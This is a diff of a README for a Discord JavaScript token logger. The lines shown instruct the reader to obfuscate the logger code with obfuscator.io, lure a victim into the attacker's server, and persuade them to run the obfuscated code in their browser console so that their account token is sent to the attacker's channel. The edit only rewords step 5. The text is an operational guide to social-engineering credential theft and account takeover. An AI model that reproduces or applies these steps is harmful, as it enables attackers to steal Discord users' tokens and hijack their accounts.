TITANMODE/Discord-Javascript-Token-Logger/README.md

 4. Go to https://obfuscator.io and paste in the full code and then get the new code that is obsfucated.

-5. Convince a user to join that server and execute the obsfucated code inside of the inspect element console.
-This should make the user send their token.
+5. Convince a user to join your created server and execute the obsfucated code inside of the inspect element console.
+This should make the user send their token in the provided channel.